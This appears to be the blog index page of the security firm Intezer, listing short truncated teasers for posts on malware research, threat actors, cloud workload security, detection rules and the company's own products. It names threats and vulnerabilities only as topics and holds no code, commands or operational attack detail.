This post describes the technical analysis of a new campaign detected by Intezer’s research team, which initiates attacks with a phishing email...
Integrate with SentinelOne, CrowdStrike, and More One of the biggest pain points of cyber security teams is alert fatigue – trying to...
Adversaries are highly motivated, constantly expanding and improving their tools and techniques. On the other side of the fight, security teams are...
Save time during incident response with these tips and tools to help your team accelerate HD, memory, and live...
One of the biggest pain points of cyber security teams is alert fatigue – trying to keep up with a tedious, never-ending...
Sigma is a universal markup language for analyzing logs, which you can use to write threat hunting and detection rules for evolving...
Generate Advanced YARA Rules Based on Code Reuse Incorporating YARA into daily security operations can accelerate incident response time, classify malware, empower...
In our interconnected society, the telecom industry is responsible for keeping the world connected 24/7. The telecommunication infrastructure uses satellites, internet providers,...
Manufacturers are building automated workflows for alert triage, incident response, and threat hunting to meet a rising volume of...
Portable Document Format (PDF) files are cross-platform file format, supporting links, images, and fonts. The flexibility of the PDF format makes these...
A recently developed malware framework called Elephant is being delivered in targeted spear phishing campaigns using spoofed Ukrainian governmental email addresses. The...
Automation can augment your security team to help you manage never-ending alerts, reduce skill gaps, and respond...
Sigma rules are catching on more and more for SOC teams, as a way to write one rule that can be used...
Use this open-source Just-In-Time database access control tool (integrated with directory service, slack, and SIEM) to secure your...
Analyzing suspicious URLs on an individual basis can be tricky, but when you’re facing a large volume of potentially malicious URLs then...
Threat actors have a wide range of tools and techniques they can use in cyber attacks including: malware-as-a-service, open-source tools and malware...
At Intezer, we recently launched a URL analysis feature that will allow detecting phishing or malicious URLs. To do so, we have...
This post was originally published as a white paper in September 2021. Get the full report as a PDF here. Zusammenfassung (Executive...
As part of our ongoing effort to allow you to investigate any security incident, we have made an important expansion to the...
When you reverse engineer code as part of an incident response team, you want to quickly get information about what kind of...
Financial services are a high target for cyberattackers. The reason is easy to understand: attackers follow the money. Most work in this...
A “honeypot” is a metaphor that references using honey as bait for a lure or trap. Honeypots have served many purposes in...
All the most common file types that can be used to deliver malicious code, including Microsoft Office files, are supported in Intezer...
Malware targeting multiple operating systems has become no exception in the malware threat landscape. Vermilion Strike, which was documented just last September,...
Malware researchers require a diverse skill set usually gained over time through experience and self-training. Reverse engineering (RE) is an integral part of...
Threat actors use malicious software to cause damage to individuals and organizations. Malware is the most common form of a cyberattack because...
Vulnerabilities like Log4Shell (CVE-2021-44228) are difficult to contain using traditional mitigation options and they can be hard to patch. It can be hard to...
The skillset of performing binary analysis may to some appear to be limited to a few undeadly souls. While it may look...
Malware is the thorn in the side of security analysts everywhere. The main question when getting a suspicious file alert is, “Is...
Research between Intezer and Checkmarx describes ChainJacking, a type of software supply chain attack that could be potentially exploited by threat actors...
The MITRE Corporation released D3FEND™ (aka MITRE DEFEND™), a complementary framework to its industry acclaimed MITRE ATT&CK® matrix. MITRE D3FEND provides defense techniques...
GitLab servers are under attack with a now-patched critical vulnerability Earlier this week we investigated an incident that occurred on a new...
Workflow management platforms are powerful tools for automating and managing complex tasks. Integrating workflow platforms can help companies coordinate and ease their...
Cloud Workload Protection Platforms (CWPPs) are a new generation of modern, scalable security solutions designed to protect applications in today’s landscape of...
This research refers to misconfigured Apache Airflow managed by individuals or organizations (“users”). As a result of the misconfiguration, the credentials of...
Cloud security constructs are always aligned with the concept of shared responsibility. GCP emulates this principle with its own shared responsibility model,...
Do you remember how it felt to get your first email account? Not only were you able to communicate with multiple people...
When analyzing malware, one of the goals in addition to identifying what malware it is, is to understand what it does when...
Key Findings Discovered Linux & Windows re-implementation of Cobalt Strike Beacon written from scratchLinux malware is fully undetected by vendorsHas IoC and...
The cloud has completely transformed the IT landscape over the last few years. And it’s now entering a new era of hybrid-cloud...
We are happy to introduce the Intezer Analyze plugin for Maltego. Combine insights from our malware analysis platform with Maltego’s graphical tool (And you...
Cobalt Strike is a penetration testing tool created by Raphael Mudge in 2012. To this day, it remains extremely popular both in...
The MITRE Corporation recently released MITRE D3FEND™, a complementary framework to its industry acclaimed MITRE ATT&CK® matrix. D3FEND provides defense techniques that...
Enterprises today rely on a wide range of cloud services—infrastructure as a service (IaaS), platform as a service (PaaS), software as a...
Automate malware analysis of Netfilter rootkit and other advanced threats. Obtain deep insights without long, manual effort. News broke in June about a...
How to scope, plan, and execute an effective supply chain security initiative. Supply Chain is Latest Land Grab for Cyber Attackers Software...
Key Points Intezer has detected a new attack vector against Kubernetes (K8s) clusters via misconfigured Argo Workflows instances. Attackers are already taking advantage of this...
Itai Tevet, CEO of Intezer, shares the company’s vision for a simplified, consolidated malware analysis experience. Since its inception, Intezer has strived...
In May 2021, Fortinet published a report about the early stages of an ongoing phishing attack against the Ukrainian government. The attack, initially...
Our research team has found a sophisticated campaign, active for at least one year, targeting large international companies in the energy, oil...
Malware threats come in many forms. You can now analyze more of them with Intezer Analyze We have made a major expansion...
Validating your Software Supply Chain for Tampering SolarWinds, Codecov and now Kaseya are the latest supply chain attacks we know about. In...
With more malware written in Golang than ever before, the threat from Go-based Remote Access Trojans (RATs) has never been higher. Not only...
If you have servers connected to the internet, you likely have valuable data stored on them that needs to be protected from...
Prioritize immediate risks in your cloud production environment Recently added Intezer Protect features for reducing the likelihood of an attack have a unique...
Bazar is the latest tool developed by the TrickBot gang Common malware used for cybercrime such as Agent Tesla, Dridex and Formbook...
73% of organizations using the cloud are not sure which parts of security fall under their responsibility. Ultimately, the customer is responsible for...
Security is changing as companies move their mission-critical workloads to the cloud, with Azure as one of the preferred destinations. Security in Azure follows...
Like all leading cloud service providers, AWS follows a shared responsibility model for security and compliance. While platform-level security is owned and managed...
In this post I will explain how the Microsoft Azure Virtual Machine (VM) extension works and how we found a fatal vulnerability in...
We have discovered a new malware written in Go, which we are calling HabitsRAT, targeting both Windows and Linux machines. The Windows version of...
Not All Applications are Cloud-Native Companies are adopting cloud at a faster pace but not all applications are born cloud-native. Many traditional...
One of the most common benefits of transitioning to cloud services is the shared responsibility for securing your assets. But cloud providers...
New Malware Variant Exploits Production Environment Rocke Group is a Chinese-based threat actor most known for running cryptojacking malware on Linux machines. The...
The arrival of the cloud has changed the application development process. Agile cloud-native applications have replaced traditional monolithic application architectures, and components...
With Linux being the operating system for 96% of the cloud, the landscape has changed beyond endpoint detection. Intezer Protect is built...
Significantly reduce memory forensics time from hours to minutes Memory analysis is a core component of a typical incident response process. In many cases...
We’re excited to announce the release of two new Intezer Protect features. Intezer Protect now offers under the same roof not only...
They all target Linux systems For a long time Linux has not been seen as a serious target of threat actors. This...
We discovered a new sophisticated backdoor targeting Linux endpoints and servers Based on Tactics, Techniques, and Procedures (TTPs) the backdoor is believed to...
Dov Lerner from Cybersixgill contributed to this report Intro Programmers frequently reuse code, as recycling something that is already written and functional is...
Kaiji is a Linux malware that targets cloud servers Last week we detected a new Kaiji variant. It was undetected by all...
Developers are not the only ones that have adopted Go. Malware written in Go has been steadily increasing. In the last few...
Intezer’s 2021 X-Force Threat Intel Index Highlights It was a lot of fun collaborating with IBM on their 2021 X-Force Threat Intelligence...
Getting Caught Up to Speed So far in this series we have profiled the ELF threat landscape and covered the most common...
Classifying a threat is just the first step in a malware analyst’s investigation. You know it’s malicious but what does it do?...
Kubernetes is one of the top open-source container orchestration projects, as it dramatically simplifies the creation and management of applications by providing...
It can be the difference between maintaining a safe environment for your applications or a compromised machine running malicious code. Misconfiguration of...
Summary of Findings What is Azure Functions? Technical Analysis Proof of Concept Why Does this Matter? Summary of Findings In previous months...
Cryptocurrency is trending. Bitcoin traded at a record high nearly $42,000 this month. Now Ether, the world’s second largest cryptocurrency, is closing in...
For organizations, cloud adoption is the primary driver of digital transformation and modernizing traditional applications to cloud constructs is a major milestone....
Intro Linux threats are becoming more frequent. A common type of Linux threat is cryptojacking, which is the unauthorized use of an...
What is Proactive Hunting? Advanced attacks like the SolarWinds backdoor and Pay2KEY are on the rise, while preventive solutions have failed to detect them....
Already with thousands of victims. Intro With Bitcoin on the rise and a market exceeding billions of dollars, cryptocurrency has attracted threat actors...
Intro In early December, we discovered a new, undetected worm written in Golang. This worm continues the popular 2020 trend of multi-platform malware developed...
We tagged 2019 as The Year of the Linux Threat. That trend continued in 2020 with high profile APTs launching ELF malware,...
Last week we launched the community edition of Intezer Protect. With strong Linux threat detection, low overhead and no slowdown in performance, Intezer Protect is...
We’re rolling out an important update to the Intezer Analyze community edition to better accommodate our users. Effective December 17 community users will have...
Summary In November, we uncovered COVID-19 phishing lures that were used to deliver the Go version of Zebrocy. Zebrocy is mainly used...
Free runtime protection for your cloud workloads Get Started Today we go live with the Intezer Protect community edition. After a few months...
Blogs about Linux cloud security are nothing new. However, most are filled with technical jargon that can make them difficult to understand....
Intro It is common for threat actors to evolve their Linux malware. BlackTech with their new ELF_PLEAD malware and Winnti’s PWNLNX tool are recent examples....
Intro In our last blog post we disclosed an escalation of privileges vulnerability in Microsoft Azure App Services. In this post, we’ll describe...
Code execution is the key ingredient in any successful cyber attack. Exploiting a misconfiguration or vulnerability are some of the more common...
In the spirit of Halloween we’re giving away YARA signatures for TrickBot and Emotet. Last year we handed out signatures for malware...
For traditional data center operations, security and compliance requirements have always been operational overhead. Traditional data centers are under unique stresses in...
Stop and think for a moment. How many virtual machines (VMs) do you have running in your production cloud environment? How many...
We’ve made some updates in Intezer Analyze to improve your incident response and threat intelligence workflows. From classifying samples faster to staying...
Cloud proliferation is on the rise, and more than ever before, security teams are on the lookout for solutions that align with...
Main Findings We discovered two vulnerabilities in Microsoft Azure. They existed in a popular cloud service called Azure App Services—specifically impacting Linux...
Just after the publication of this post the US-CERT released an alert about Emotet. Evolution is the result of adaptations that take...
Introduction The development of cross-platform malware is not new, however, we continue to observe a number of malware that were previously documented only...
The term Offensive Security Tool, also known as OST, is a controversial subject within the InfoSec community. It often sparks fierce debate...
APTs are targeting Linux systems more than they ever have. Linux Attacks are on the Rise The research community continues to witness...
There are many solutions available for securing your cloud applications and workloads. Even after doing your due diligence and making an investment,...
Taking inspiration from the MITRE ATT&CK® framework, we previously developed a matrix categorizing adversary tactics and techniques for Linux cloud servers. Linux...
Introduction TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. The group has been previously documented using...
Introduction Offensive Security Tools are any kind of functionality meant to facilitate intrusions and security bypasses in order to achieve the former....
Introduction In the previous article we profiled the ELF malware landscape and explained how malware infects systems. We discussed the current lack...
Update: Intezer Protect community edition is out of Beta and now available to everyone. Get Started Today we go live with the...
Key Findings Ngrok Mining Botnet is an active campaign targeting exposed Docker servers in AWS, Azure, and other cloud platforms. It has...
Zero Trust Execution is the industry recommended practice for securing workloads in the cloud. It provides a tight grip on your workloads...
Incident investigations usually begin with a triggered alert. One of the sensors deployed across your organization claims that suspicious activity has occurred...
Kubernetes (K8s) is the universal solution for container orchestration nowadays. This open-source tool allows a cluster to automatically scale, distribute, and handle...
Ghidra is a free and open source reverse engineering tool developed by the NSA. The plugin reduces the burden on the analyst...
Cloud Workload Protection (CWP) refers to the security of workloads running in the cloud in any type of computing environment, e.g. physical...
With an emphasis placed on protecting Windows endpoints, the antivirus industry is struggling to detect Linux threats. In a 2019 study conducted by...
Unpatched or undetected software vulnerabilities are a common method for malware delivery once exploited by attackers. Last month, the US-CERT urged IT...
The Intezer Analyze IDA Pro plugin is now available to community users! IDA Pro is the most common reverse engineering platform for...
The move to containerized workloads has proven to be a revolutionary step in the evolution of software engineering and distributed systems. One...
Introduction Linux has a large presence in the operating systems market because it’s open-sourced, free, and software development oriented—meaning its rich ecosystem...
We dubbed 2019 the year of Linux threats, evidenced by over 20 of our researcher’s publications related to attacks on this operating...
The use of Application Control—commonly referred to as whitelisting or Zero Trust Execution—is considered to be a robust and essential Cloud Workload...
See below some of the threats our community detected this month 1. Fileless Dridex sample, originally with five detections in VirusTotal, contains a payload...
Linux has become the “go-to” OS in cloud computing, running 90% of the public cloud workload. Linux usage has even surpassed Windows...
The Ke3chang group, also known as APT15, is an alleged Chinese government-backed cluster of teams known to target various high-profile entities spanning...
Intezer Protect, Intezer’s new Cloud Workload Protection Platform (CWPP), has been recognized in the latest Gartner Market Guide only four months since...
Recently attackers exploited vulnerabilities in the popular SaltStack infrastructure automation software to infect cloud servers. Several organizations and open-source projects had to...
It is not often that you see a botnet’s tooling written from scratch. The Internet of things (IoT) botnet ecosystem is relatively well-documented by...
Cloud Workload Protection is the protection and overall security of workloads running in the cloud in any type of computing environment. As...
Maze ransomware, APT41 and Lazarus highlight this month’s community samples 1. More_eggs variant with low Antivirus detections has modified string encoding mechanisms...
Threat actors are exploiting fear and uncertainty to spread Covid-19 themed malicious Android package kits (APKs) onto users’ mobile devices. APKs pose...
Under Armour’s famous slogan sums up the mission perfectly: We Must Protect this House. As adoption of cloud services continues, security teams...
Checklist for protecting your Linux cloud servers against cyber attacks Taking inspiration from the MITRE ATT&CK® framework, we have developed a matrix categorizing...
Accelerate your file investigations with new and improved string reuse capabilities in Intezer Analyze Users of Intezer Analyze may have noticed new...
Attackers have long used evasion features in their malware to avoid detection by security products and analysis systems. One of the most...
Conducting business in a cloud environment presents unique security challenges, including achieving and maintaining compliance with regulations that were designed with traditional...
Code reuse analysis vs. signature-based detection We are often asked the question, “what sets your approach apart from other malware detection solutions?”...
IDA Pro is the most common reverse engineering platform for disassembling computer software. The Intezer Analyze IDA Pro plugin accelerates reverse engineering...
This month’s community highlights span a variety of file formats — APK, ELF and PE. 1) Anubis [Link to Analysis] Anubis is...
This year’s RSA Conference theme is the Human Element. At Intezer, we introduce an innovative approach called Genetic Malware Analysis which reveals the...
Banking trojans and ransomware were the top innovators in 2019 malware code evolution Drawing on previous IBM X-Force collaboration in detecting new...
Introduction Our researchers Paul Litvak and Michael Kajilolti have discovered a new campaign conducted by APT34 employing an updated toolset. Based on uncovered...
Introduction Our research team has identified new versions of an old Linux malware known as Rekoobe, a minimalistic trojan with a complex CNC...
Unveiling our Cloud Workload Protection Platform (CWPP) which defends your cloud servers in runtime against the leading cause of cyber attacks: unauthorized and malicious...
Intezer Protect is our NEW runtime Cloud Workload Protection Platform (CWPP). Powered by Malware Analysis technology, this solution continuously monitors the code running...
Emotet, Trickbot, and Lazarus were the most common threats detected by the community in 2019. Linux threats, with code connections to Mirai,...
What an amazing year it has been for us at Intezer! The company nearly doubled in size, we added several new important...
Introduction ChinaZ is a Chinese cybercrime group and the author of several DDoS malware. We have profiled this group in a previous...
We are excited to share that we now support Genetic Malware Analysis for Android applications! Intezer Analyze community and enterprise users can...
Distributed denial-of-service attacks were on the rise in 2018 and continuing into 2019, ranging from a high volume of Mirai attacks to...
In this month’s community highlights we see a range of malware types, including banking trojans, exploit kits, and nation-state sponsored threats. 1)...
Summary Nearly all cyber attacks require running code. Regardless of the attack vector, in order for an adversary to create any damage,...
Intezer Analyze now proudly supports genetic analysis for files created with the Golang programming language. Community and enterprise users can detect and...
Introduction We have discovered an undetected Linux backdoor which does not have any known connections to other threat groups. VirusTotal detection rate...
Analysis by Intezer and IBM X-Force points its origins to a Malware-as-a-Service (MaaS) provider utilized by the Cobalt Gang and FIN6 attack...
In the spirit of Halloween we’re spotlighting three “spooky” threats detected by the Intezer Analyze community in October. And as a special...
For mid to large size enterprises, protecting the organization against targeted cyber threats is often a global operation. It’s not uncommon for...
This research is a joint effort conducted by Omri Ben-Bassat from Intezer and Itay Cohen from Check Point Research. Prologue пролог If...
Introduction We previously reported on how we managed to temporarily shut down 15 operative QNAPCrypt ransomware campaigns targeting Linux-based file storage systems...
In a previous post we wrote for the Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC), we discussed the emergence of...
At BlackHat Arsenal 2019 Intezer’s researcher, Omri Ben-Bassat, revealed open-source tool called MoP (“Master of Puppets”) which is a framework for reverse...
In July, Intezer Analyze community detections included GonnaCry ransomware, the HawkEye malware kit, and BXAQ, the spyware that Chinese authorities have been...
One of the most common and time-consuming cases security operations centers (SOCs) must complete daily are malware investigations. Part of the problem...
In addition to highlighting five notable file uploads and endpoint scans made by our community users each month, I thought it was...
Overview We have discovered a new version of WatchBog—a cryptocurrency-mining botnet operational since late 2018—that we suspect has compromised more than 4,500 Linux...
Introduction Linux desktop remains an unpopular choice among mainstream desktop users, making up a little more than 2% of the desktop operating system...
Introduction It is rare to see ransomware being used to target the Linux operating system. However, cyber criminals seem to adapt to...
1) BlackSquid [Link to Analysis] BlackSquid is a Monero crypto-miner which was recently discovered by researchers at Trend Micro. According to Trend...
I am pleased to highlight the new integration between Intezer Analyze™ and IBM Resilient. The integration enables users of both platforms to...
This blog post was featured as contributing content for the Retail and Hospitality Information Sharing and Analysis Center (RH-ISAC). The Linux threat...
This is a new post in our Executable and Linkable Format (ELF) 101 series, where the goal is to spread awareness about the...
1) Pirpi (APT3) [Link to Analysis] APT3, commonly referred to as Gothic Panda, TG-0110 and Buckeye, is a Chinese cyber espionage group...
Overview • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems. • The malware is still...
This blog post serves as a preview to an Infosecurity Europe tech talk that will be presented on Wednesday, June 5, 2019....
Pacha Group is a crypto-mining threat actor we at Intezer discovered and profiled in a blog post published on February 28, 2019....
The Pacha Group is a threat actor discovered by Intezer and profiled in a blog post published on February 28, 2019. Dating back...
This month’s Intezer Analyze community findings include malware employed by two cyber espionage groups linked to the Russian government and an endpoint...
Get to know Intezer’s community manager, Shaul Holtzman. Shaul is a former cybersecurity analyst helping organizations detect and classify advanced cyber threats....
I am excited to announce the launch of a new Endpoint Analysis solution, located within the Intezer Analyze™ platform. The Endpoint Analysis solution consists...
Last month I published a blog post highlighting notable uploads made by the Intezer Analyze community during the month of February. In...
Introduction Cryptomining malware, also known as cryptojacking or cryptocurrency mining malware, refers to software developed to take over a computer’s resources and...
Key Takeaways: • Intezer has evidence of a new threat actor, calling it Pacha Group, which has been deploying undetected cryptojacking campaigns...
As manager of the free Intezer Analyze community edition I witness first hand the interesting samples our users upload on a daily...
On behalf of Intezer, I am pleased to announce the release of an API for the Intezer Analyze community edition. Members of...
At Intezer, we view malware analysis as a key component in properly and effectively responding to security incidents. We have introduced a...
Introduction Distributed denial-of-service (DDoS) attacks were on the rise in 2018, ranging from a high volume of Mirai attacks to more sophisticated...
Today My Online Security published research describing a fairly large Ursnif campaign targeting the United Kingdom. The threat actors behind the attack are using...
Alerts can enter an organization at inconceivable rates. Security teams are tasked with sifting through countless alerts, making it difficult to prioritize...
The Muhstik botnet was first exposed by Netlab360 researchers in May 2018. This botnet targeted mainly GPON routers. At Intezer we found that Muhstik is extending its spectrum...
At Intezer information sharing is a key component of our makeup and reflected in our technology. In the spirit of industry collaboration...
INTRODUCTION As seen by security researchers across the world and proven in a joint research by McAfee and Intezer, Lazarus, one of...
Researchers at Palo Alto Networks recently published a report regarding the NOKKI malware, which has shared code with KONNI and, although not in...
ELF SUPPORT We would like to proudly announce that Intezer Analyze™ now supports genetic malware analysis for ELF binaries! You may now...
Introduction In the past couple years, Palo Alto Networks reported on the “Prince of Persia” malware campaign which is believed to be...
Our technology is based on genetic analysis of files. So far, we’ve focused mainly on detection of code reuse, as part of...
This research is a joint effort of Christiaan Beek, lead scientist & sr. principal engineer at McAfee, and Jay Rosenberg, senior security researcher...
Recently, Proofpoint released a fairly surprising report, stating that Banking Trojans have surpassed Ransomware as the top malware threat found in email....
In this blog post we’d like to share with you some details about our latest cool developments. New User Interface: We’ve recently...
APT15 Background Coincidentally, following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare, we...
As stated in a previous blog entry, it is common for malware authors to sign malicious files with “legitimate” digital certificates in...
In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code....
In our previous post, we went through the concept of symbols and their functionality. In this post we will introduce the concept...
GET AN INDEPENDENT EXAMINATION OF YOUR IT ENVIRONMENT TO DETECT ANY EXISTING CYBER ATTACK IN YOUR NETWORK Intezer, today announced the release...
After launching Intezer community edition in November 2017, we noticed that many of our users uploaded packed samples. Yet packed files don’t reveal the...
Cyber security is constantly evolving, and therefore rife with challenges. Whether hobbyist hackers or state-sponsored threat actors are targeting organizations, internal security...
Detecting Reused Ransomware Whether we’re dealing with a criminal threat actor looking to steal money from their victims using ransomware or malware...
In our previous post, we focused on understanding the relationship between sections and segments, which serve as the foundation for understanding the...
Introduction This marks the first of several blog posts that will focus on Executable and Linkable Format (ELF) files. In this series,...
As we have proven in previous research blog posts, malware authors often reuse the same code. This evolution of code and code...
Recent research conducted by the Cyber Security Research Institute (CSRI) demonstrates how easy and common it is for threat actors to purchase...
This isn’t a gimmick, we’re providing this quota FREE of charge. Intezer Analyze™ was created by incident team experts for incident response...
IBM X-Force recently released an excellent report on a new banking trojan named IcedID that is being distributed using computers already infected...
Kaspersky Labs published a technical analysis of a new malware, Silence that is aimed at attacking financial institutions. After uploading the loader...
Since my last post, we have found new evidence in the next stage payloads of the CCleaner supply chain attack that provide...
Large scale cyber attacks seem to be happening once a month these days. Originally discovered by ESET (https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/), Ukrainian and Russian organizations...
Security teams have a lot of noise to deal with in their day-to-day jobs. Every organization is managing thousands of alerts each...
Serial entrepreneur Alon Cohen co-founded and grew one of the world’s first cyber security startups, CyberArk, which eventually became a ‘unicorn’. Now,...
Software developers and malware authors share a desire to work smart, not hard In the software development world, engineers frequently use ready-made...
Since my last post, we have found new evidence in the next stage payloads of the CCleaner supply chain attack that provide...
Recently, there have been a few attacks with a supply chain infection, such as Shadowpad being implanted in many of Netsarang’s products,...
Why Standard Hash Functions Aren’t Helpful In Memory At Intezer, we specialize in analyzing code from memory to deal with injections, process...
Our previous blog post was a short brief of new Agent.BTZ variants that we found. This second part in the series will...
Itai Tevet was the self-described ‘PC kid’ whose fascination with technology led to a strong interest in information security–an interest that benefited...
Throughout my career, I have witnessed many cyber security professionals adopting a “shoot and don’t ask questions” approach when dealing with malware....
Every organization that is impacted by the sharing and storage of data are discussing the General Data Protection Regulation (GDPR), a recently...
Agent.BTZ–also known as ComRAT–is one of the world’s oldest known state-sponsored threats, mainly known for the 2008 Pentagon breach. Technically speaking, Agent.BTZ...
About eight weeks ago, a critical RCE vulnerability present in every Samba version since 2010 was reported and patched. This vulnerability is...
Every day, wars are being waged on invisible battlefields. The enemy is hiding and stealthily leveling its attacks from within. This formidable...